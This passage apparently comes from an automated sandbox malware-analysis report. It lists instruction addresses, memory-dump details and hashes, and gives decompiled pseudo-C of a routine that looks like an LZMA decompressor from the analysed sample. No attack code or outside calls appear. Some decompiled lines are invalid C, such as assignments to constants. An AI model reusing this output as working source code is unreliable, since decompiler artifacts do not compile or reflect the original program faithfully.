							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                  0x00000000
                                  0x00407234
                                  0x00407234
                                  0x00407238
                                  0x0040725d
                                  0x00407267
                                  0x00000000
                                  0x0040723a
                                  0x0040723a
                                  0x0040723d
                                  0x00407241
                                  0x00407244
                                  0x00407247
                                  0x0040724b
                                  0x0040724b
                                  0x0040724e
                                  0x00407328
                                  0x00407328
                                  0x0040732f
                                  0x0040732f
                                  0x00407332
                                  0x00407339
                                  0x00407366
                                  0x0040736a
                                  0x004073ca
                                  0x004073cd
                                  0x004073d2
                                  0x004073d3
                                  0x004073d5
                                  0x004073d7
                                  0x004073da
                                  0x004072e6
                                  0x004072e6
                                  0x004072e6
                                  0x00406a82
                                  0x00406a82
                                  0x00406a82
                                  0x00406a8b
                                  0x00000000
                                  0x00000000
                                  0x00406a91
                                  0x00000000
                                  0x00406a9c
                                  0x00000000
                                  0x00000000
                                  0x00406aa5
                                  0x00406aa8
                                  0x00406aab
                                  0x00406aaf
                                  0x00000000
                                  0x00000000
                                  0x00406ab5
                                  0x00406ab8
                                  0x00406aba
                                  0x00406abb
                                  0x00406abe
                                  0x00406ac0
                                  0x00406ac1
                                  0x00406ac3
                                  0x00406ac6
                                  0x00406acb
                                  0x00406ad0
                                  0x00406ad9
                                  0x00406aec
                                  0x00406aef
                                  0x00406afb
                                  0x00406b23
                                  0x00406b25
                                  0x00406b33
                                  0x00406b33
                                  0x00406b37
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406b27
                                  0x00406b27
                                  0x00406b2a
                                  0x00406b2b
                                  0x00406b2b
                                  0x00000000
                                  0x00406b27
                                  0x00406b01
                                  0x00406b06
                                  0x00406b06
                                  0x00406b0f
                                  0x00406b17
                                  0x00406b1a
                                  0x00000000
                                  0x00406b20
                                  0x00406b20
                                  0x00000000
                                  0x00406b20
                                  0x00000000
                                  0x00406b3d
                                  0x00406b3d
                                  0x00406b41
                                  0x004073ed
                                  0x00000000
                                  0x004073ed
                                  0x00406b4a
                                  0x00406b5a
                                  0x00406b5d
                                  0x00406b60
                                  0x00406b60
                                  0x00406b60
                                  0x00406b63
                                  0x00406b67
                                  0x00000000
                                  0x00000000
                                  0x00406b69
                                  0x00406b6f
                                  0x00406b99
                                  0x00406b9f
                                  0x00406ba6
                                  0x00000000
                                  0x00406ba6
                                  0x00406b75
                                  0x00406b78
                                  0x00406b7d
                                  0x00406b7d
                                  0x00406b88
                                  0x00406b90
                                  0x00406b93
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406bd8
                                  0x00406bde
                                  0x00406be1
                                  0x00406bee
                                  0x00406bf6
                                  0x00000000
                                  0x00000000
                                  0x00406bad
                                  0x00406bad
                                  0x00406bb1
                                  0x004073fc
                                  0x00000000
                                  0x004073fc
                                  0x00406bbd
                                  0x00406bc8
                                  0x00406bc8
                                  0x00406bc8
                                  0x00406bcb
                                  0x00406bce
                                  0x00406bd1
                                  0x00406bd6
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040726d
                                  0x0040726d
                                  0x00407273
                                  0x00407279
                                  0x0040727f
                                  0x00407299
                                  0x0040729c
                                  0x004072a2
                                  0x004072ad
                                  0x004072ad
                                  0x004072af
                                  0x00407281
                                  0x00407281
                                  0x00407290
                                  0x00407294
                                  0x00407294
                                  0x004072b9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004072bb
                                  0x004072bf
                                  0x0040746e
                                  0x00000000
                                  0x0040746e
                                  0x004072cb
                                  0x004072d2
                                  0x004072da
                                  0x004072dd
                                  0x004072e0
                                  0x004072e0
                                  0x00000000
                                  0x00000000
                                  0x00406bfe
                                  0x00406c00
                                  0x00406c03
                                  0x00406c74
                                  0x00406c77
                                  0x00406c7a
                                  0x00406c81
                                  0x00406c8b
                                  0x00000000
                                  0x00406c8b
                                  0x00406c05
                                  0x00406c09
                                  0x00406c0c
                                  0x00406c0e
                                  0x00406c11
                                  0x00406c14
                                  0x00406c16
                                  0x00406c19
                                  0x00406c1b
                                  0x00406c20
                                  0x00406c23
                                  0x00406c26
                                  0x00406c2a
                                  0x00406c31
                                  0x00406c34
                                  0x00406c3b
                                  0x00406c3f
                                  0x00406c47
                                  0x00406c47
                                  0x00406c47
                                  0x00406c41
                                  0x00406c41
                                  0x00406c41
                                  0x00406c36
                                  0x00406c36
                                  0x00406c36
                                  0x00406c4b
                                  0x00406c4e
                                  0x00406c6c
                                  0x00406c6e
                                  0x00000000
                                  0x00406c50
                                  0x00406c50
                                  0x00406c53
                                  0x00406c56
                                  0x00406c59
                                  0x00406c5b
                                  0x00406c5b
                                  0x00406c5b
                                  0x00406c5e
                                  0x00406c61
                                  0x00406c63
                                  0x00406c64
                                  0x00406c67
                                  0x00000000
                                  0x00406c67
                                  0x00000000
                                  0x00406e9d
                                  0x00406ea1
                                  0x00406ebf
                                  0x00406ec2
                                  0x00406ec9
                                  0x00406ecc
                                  0x00406ecf
                                  0x00406ed2
                                  0x00406ed5
                                  0x00406ed8
                                  0x00406eda
                                  0x00406ee1
                                  0x00406ee2
                                  0x00406ee4
                                  0x00406ee7
                                  0x00406eea
                                  0x00406eed
                                  0x00406eed
                                  0x00406ef2
                                  0x00000000
                                  0x00406ef2
                                  0x00406ea3
                                  0x00406ea6
                                  0x00406ea9
                                  0x00406eb3
                                  0x00000000
                                  0x00000000
                                  0x00406f07
                                  0x00406f0b
                                  0x00406f2e
                                  0x00406f31
                                  0x00406f34
                                  0x00406f3e
                                  0x00406f0d
                                  0x00406f0d
                                  0x00406f10
                                  0x00406f13
                                  0x00406f16
                                  0x00406f23
                                  0x00406f26
                                  0x00406f26
                                  0x00000000
                                  0x00000000
                                  0x00406f4a
                                  0x00406f4e
                                  0x00000000
                                  0x00000000
                                  0x00406f54
                                  0x00406f58
                                  0x00000000
                                  0x00000000
                                  0x00406f5e
                                  0x00406f60
                                  0x00406f64
                                  0x00406f64
                                  0x00406f67
                                  0x00406f6b
                                  0x00000000
                                  0x00000000
                                  0x00406fbb
                                  0x00406fbf
                                  0x00406fc6
                                  0x00406fc9
                                  0x00406fcc
                                  0x00406fd6
                                  0x00000000
                                  0x00406fd6
                                  0x00406fc1
                                  0x00000000
                                  0x00000000
                                  0x00406fe2
                                  0x00406fe6
                                  0x00406fed
                                  0x00406ff0
                                  0x00406ff3
                                  0x00406fe8
                                  0x00406fe8
                                  0x00406fe8
                                  0x00406ff6
                                  0x00406ff9
                                  0x00406ffc
                                  0x00406ffc
                                  0x00406fff
                                  0x00407002
                                  0x00407005
                                  0x00407005
                                  0x00407008
                                  0x0040700f
                                  0x00407014
                                  0x00000000
                                  0x00000000
                                  0x004070a2
                                  0x004070a2
                                  0x004070a6
                                  0x00407444
                                  0x00000000
                                  0x00407444
                                  0x004070ac
                                  0x004070af
                                  0x004070b2
                                  0x004070b6
                                  0x004070b9
                                  0x004070bf
                                  0x004070c1
                                  0x004070c1
                                  0x004070c1
                                  0x004070c4
                                  0x004070c7
                                  0x00000000
                                  0x00000000
                                  0x00406c97
                                  0x00406c97
                                  0x00406c9b
                                  0x00407408
                                  0x00000000
                                  0x00407408
                                  0x00406ca1
                                  0x00406ca4
                                  0x00406ca7
                                  0x00406cab
                                  0x00406cae
                                  0x00406cb4
                                  0x00406cb6
                                  0x00406cb6
                                  0x00406cb6
                                  0x00406cb9
                                  0x00406cbc
                                  0x00406cbc
                                  0x00406cbf
                                  0x00406cc2
                                  0x00000000
                                  0x00000000
                                  0x00406cc8
                                  0x00406cce
                                  0x00000000
                                  0x00000000
                                  0x00406cd4
                                  0x00406cd4
                                  0x00406cd8
                                  0x00406cdb
                                  0x00406cde
                                  0x00406ce1
                                  0x00406ce4
                                  0x00406ce5
                                  0x00406ce8
                                  0x00406cea
                                  0x00406cf0
                                  0x00406cf3
                                  0x00406cf6
                                  0x00406cf9
                                  0x00406cfc
                                  0x00406cff
                                  0x00406d02
                                  0x00406d1e
                                  0x00406d21
                                  0x00406d24
                                  0x00406d27
                                  0x00406d2e
                                  0x00406d32
                                  0x00406d34
                                  0x00406d38
                                  0x00406d04
                                  0x00406d04
                                  0x00406d08
                                  0x00406d10
                                  0x00406d15
                                  0x00406d17
                                  0x00406d19
                                  0x00406d19
                                  0x00406d3b
                                  0x00406d42
                                  0x00406d45
                                  0x00000000
                                  0x00406d4b
                                  0x00000000
                                  0x00406d4b
                                  0x00000000
                                  0x00406d50
                                  0x00406d50
                                  0x00406d54
                                  0x00407414
                                  0x00000000
                                  0x00407414
                                  0x00406d5a
                                  0x00406d5d
                                  0x00406d60
                                  0x00406d64
                                  0x00406d67
                                  0x00406d6d
                                  0x00406d6f
                                  0x00406d6f
                                  0x00406d6f
                                  0x00406d72
                                  0x00406d75
                                  0x00406d75
                                  0x00406d75
                                  0x00406d7b
                                  0x00000000
                                  0x00000000
                                  0x00406d7d
                                  0x00406d80
                                  0x00406d83
                                  0x00406d86
                                  0x00406d89
                                  0x00406d8c
                                  0x00406d8f
                                  0x00406d92
                                  0x00406d95
                                  0x00406d98
                                  0x00406d9b
                                  0x00406db3
                                  0x00406db6
                                  0x00406db9
                                  0x00406dbc
                                  0x00406dbc
                                  0x00406dbf
                                  0x00406dc3
                                  0x00406dc5
                                  0x00406d9d
                                  0x00406d9d
                                  0x00406da5
                                  0x00406daa
                                  0x00406dac
                                  0x00406dae
                                  0x00406dae
                                  0x00406dc8
                                  0x00406dcf
                                  0x00406dd2
                                  0x00000000
                                  0x00406dd4
                                  0x00000000
                                  0x00406dd4
                                  0x00406dd2
                                  0x00406dd9
                                  0x00406dd9
                                  0x00406dd9
                                  0x00406dd9
                                  0x00000000
                                  0x00000000
                                  0x00406e14
                                  0x00406e14
                                  0x00406e18
                                  0x00407420
                                  0x00000000
                                  0x00407420
                                  0x00406e1e
                                  0x00406e21
                                  0x00406e24
                                  0x00406e28
                                  0x00406e2b
                                  0x00406e31
                                  0x00406e33
                                  0x00406e33
                                  0x00406e33
                                  0x00406e36
                                  0x00406e39
                                  0x00406e39
                                  0x00406e3f
                                  0x00406ddd
                                  0x00406ddd
                                  0x00406de0
                                  0x00000000
                                  0x00406de0
                                  0x00406e41
                                  0x00406e41
                                  0x00406e44
                                  0x00406e47
                                  0x00406e4a
                                  0x00406e4d
                                  0x00406e50
                                  0x00406e53
                                  0x00406e56
                                  0x00406e59
                                  0x00406e5c
                                  0x00406e5f
                                  0x00406e77
                                  0x00406e7a
                                  0x00406e7d
                                  0x00406e80
                                  0x00406e80
                                  0x00406e83
                                  0x00406e87
                                  0x00406e89
                                  0x00406e61
                                  0x00406e61
                                  0x00406e69
                                  0x00406e6e
                                  0x00406e70
                                  0x00406e72
                                  0x00406e72
                                  0x00406e8c
                                  0x00406e93
                                  0x00406e96
                                  0x00000000
                                  0x00406e98
                                  0x00000000
                                  0x00406e98
                                  0x00000000
                                  0x00407125
                                  0x00407125
                                  0x00407129
                                  0x00407450
                                  0x00000000
                                  0x00407450
                                  0x0040712f
                                  0x00407132
                                  0x00407135
                                  0x00407139
                                  0x0040713c
                                  0x00407142
                                  0x00407144
                                  0x00407144
                                  0x00407144
                                  0x00407147
                                  0x00000000
                                  0x00000000
                                  0x00406ef5
                                  0x00406ef5
                                  0x00406ef8
                                  0x0040726a
                                  0x0040726a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004072f1
                                  0x004072f5
                                  0x00407313
                                  0x00407313
                                  0x00407313
                                  0x0040731a
                                  0x00407321
                                  0x00000000
                                  0x00407321
                                  0x004072f7
                                  0x004072fa
                                  0x004072fd
                                  0x00407300
                                  0x00407307
                                  0x00000000
                                  0x00000000
                                  0x004073e2
                                  0x004073e5
                                  0x004072e6
                                  0x004072e6
                                  0x00000000
                                  0x00000000
                                  0x0040701c
                                  0x0040701e
                                  0x00407025
                                  0x00407026
                                  0x00407028
                                  0x0040702b
                                  0x00000000
                                  0x00000000
                                  0x00407033
                                  0x00407036
                                  0x00407039
                                  0x0040703b
                                  0x0040703d
                                  0x0040703d
                                  0x0040703e
                                  0x00407041
                                  0x00407048
                                  0x0040704b
                                  0x00407059
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040733e
                                  0x0040733e
                                  0x00407342
                                  0x0040747a
                                  0x00000000
                                  0x0040747a
                                  0x00407348
                                  0x0040734b
                                  0x0040734e
                                  0x00407352
                                  0x00407355
                                  0x0040735b
                                  0x0040735d
                                  0x0040735d
                                  0x0040735d
                                  0x00407360
                                  0x00407363
                                  0x00407363
                                  0x00407363
                                  0x00407363
                                  0x00000000
                                  0x00000000
                                  0x00407061
                                  0x00407064
                                  0x0040709a
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071cd
                                  0x004071cd
                                  0x004071d0
                                  0x004071d2
                                  0x0040745c
                                  0x00000000
                                  0x0040745c
                                  0x004071d8
                                  0x004071db
                                  0x00000000
                                  0x00000000
                                  0x004071e1
                                  0x004071e5
                                  0x004071e8
                                  0x004071e8
                                  0x004071e8
                                  0x00000000
                                  0x004071e8
                                  0x00407066
                                  0x00407068
                                  0x0040706a
                                  0x0040706c
                                  0x0040706f
                                  0x00407070
                                  0x00407072
                                  0x00407074
                                  0x00407077
                                  0x0040707a
                                  0x00407090
                                  0x00407095
                                  0x004070cd
                                  0x004070cd
                                  0x004070d1
                                  0x004070fd
                                  0x004070ff
                                  0x00407106
                                  0x00407109
                                  0x0040710c
                                  0x0040710c
                                  0x00407111
                                  0x00407111
                                  0x00407113
                                  0x00407116
                                  0x0040711d
                                  0x00407120
                                  0x0040714d
                                  0x0040714d
                                  0x00407150
                                  0x00407153
                                  0x004071c7
                                  0x004071c7
                                  0x004071c7
                                  0x00000000
                                  0x004071c7
                                  0x00407155
                                  0x0040715b
                                  0x0040715e
                                  0x00407161
                                  0x00407164
                                  0x00407167
                                  0x0040716a
                                  0x0040716d
                                  0x00407170
                                  0x00407173
                                  0x00407176
                                  0x0040718f
                                  0x00407191
                                  0x00407194
                                  0x00407195
                                  0x00407198
                                  0x0040719a
                                  0x0040719d
                                  0x0040719f
                                  0x004071a1
                                  0x004071a4
                                  0x004071a6
                                  0x004071a9
                                  0x004071ad
                                  0x004071af
                                  0x004071af
                                  0x004071b0
                                  0x004071b3
                                  0x004071b6
                                  0x00407178
                                  0x00407178
                                  0x00407180
                                  0x00407185
                                  0x00407187
                                  0x0040718a
                                  0x0040718a
                                  0x004071b9
                                  0x004071c0
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x00000000
                                  0x004071c2
                                  0x00000000
                                  0x004071c2
                                  0x004071c0
                                  0x004070d3
                                  0x004070d6
                                  0x004070d8
                                  0x004070db
                                  0x004070de
                                  0x004070e1
                                  0x004070e3
                                  0x004070e6
                                  0x004070e9
                                  0x004070e9
                                  0x004070ec
                                  0x004070ec
                                  0x004070ef
                                  0x004070f6
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x00000000
                                  0x004070f8
                                  0x00000000
                                  0x004070f8
                                  0x004070f6
                                  0x0040707c
                                  0x0040707f
                                  0x00407081
                                  0x00407084
                                  0x00000000
                                  0x00000000
                                  0x00406de3
                                  0x00406de3
                                  0x00406de7
                                  0x0040742c
                                  0x00000000
                                  0x0040742c
                                  0x00406ded
                                  0x00406df0
                                  0x00406df3
                                  0x00406df6
                                  0x00406df9
                                  0x00406dfc
                                  0x00406dff
                                  0x00406e01
                                  0x00406e04
                                  0x00406e07
                                  0x00406e0a
                                  0x00406e0c
                                  0x00406e0c
                                  0x00406e0c
                                  0x00000000
                                  0x00000000
                                  0x00406f6e
                                  0x00406f6e
                                  0x00406f72
                                  0x00407438
                                  0x00000000
                                  0x00407438
                                  0x00406f78
                                  0x00406f7b
                                  0x00406f7e
                                  0x00406f81
                                  0x00406f83
                                  0x00406f83
                                  0x00406f83
                                  0x00406f86
                                  0x00406f89
                                  0x00406f8c
                                  0x00406f8f
                                  0x00406f92
                                  0x00406f95
                                  0x00406f96
                                  0x00406f98
                                  0x00406f98
                                  0x00406f98
                                  0x00406f9b
                                  0x00406f9e
                                  0x00406fa1
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa7
                                  0x00406fa9
                                  0x00406fa9
                                  0x00000000
                                  0x00000000
                                  0x004071eb
                                  0x004071eb
                                  0x004071eb
                                  0x004071ef
                                  0x00000000
                                  0x00000000
                                  0x004071f5
                                  0x004071f8
                                  0x004071fb
                                  0x004071fe
                                  0x00407200
                                  0x00407200
                                  0x00407200
                                  0x00407203
                                  0x00407206
                                  0x00407209
                                  0x0040720c
                                  0x0040720f
                                  0x00407212
                                  0x00407213
                                  0x00407215
                                  0x00407215
                                  0x00407215
                                  0x00407218
                                  0x0040721b
                                  0x0040721e
                                  0x00407221
                                  0x00407224
                                  0x00407228
                                  0x0040722a
                                  0x0040722d
                                  0x00000000
                                  0x0040722f
                                  0x00406fac
                                  0x00406fac
                                  0x00000000
                                  0x00406fac
                                  0x0040722d
                                  0x00407462
                                  0x00407484
                                  0x0040748a
                                  0x0040748c
                                  0x00407493
                                  0x00407495
                                  0x0040749c
                                  0x004074a0
                                  0x00000000
                                  0x00406a91
                                  0x00407499
                                  0x00407499
                                  0x00000000
                                  0x00407499
                                  0x004072e6
                                  0x0040736c
                                  0x00407372
                                  0x00407375
                                  0x00407378
                                  0x0040737b
                                  0x0040737e
                                  0x00407381
                                  0x00407384
                                  0x00407387
                                  0x0040738d
                                  0x004073a6
                                  0x004073a9
                                  0x004073ac
                                  0x004073af
                                  0x004073b3
                                  0x004073b5
                                  0x004073b6
                                  0x004073b9
                                  0x0040738f
                                  0x0040738f
                                  0x00407397
                                  0x0040739c
                                  0x0040739e
                                  0x004073a1
                                  0x004073a1
                                  0x004073c3
                                  0x00000000
                                  0x004073c5
                                  0x00000000
                                  0x004073c5
                                  0x004073c3
                                  0x00000000
                                  0x00407238

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
                                  • Instruction ID: 8a2c3c043c9bb5ba2b5721dff60c2e2798a6d81db984abdc297d3eb4e69e55d3
                                  • Opcode Fuzzy Hash: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
                                  • Instruction Fuzzy Hash: 11911170D04229CBEF28CF98C8947ADBBB1FB44305F14816ED856BB291C7786A86DF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406F4A Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 98%
                                  			E00406F4A() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004074A1))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8)); // executed
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
